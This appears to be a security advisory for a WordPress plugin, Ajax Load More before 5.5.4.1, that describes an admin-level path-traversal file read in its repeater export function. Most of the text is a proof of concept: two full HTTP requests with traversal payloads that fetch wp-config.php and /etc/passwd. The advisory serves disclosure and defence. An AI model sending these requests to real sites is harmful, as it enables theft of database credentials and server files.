Ajax Load More < 5.5.4.1 – Admin+ Arbitrary File Read

Description

The plugin does not properly validates paths generated with user input in the alm_repeaters_export() function, which could allow high privilege users to read arbitrary files form the server (even when they should not be able to have access to any, for example in multisite setup)

This is due to an incomplete fix of CVE-2022-2943

Proof of Concept

Get arbitrary PHP files, such as wp-config.php

POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

alm_repeaters_export_type=a&alm_repeaters_export=1&alm_repeaters_export_name=../../../wp-config


Get arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server not needing intermediary folders to exist, such as IIS)

POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: [admin+]

alm_repeaters_export_type=theme-repeater&alm_repeaters_export=1&alm_repeaters_export_name=../../../../../../../etc/passwd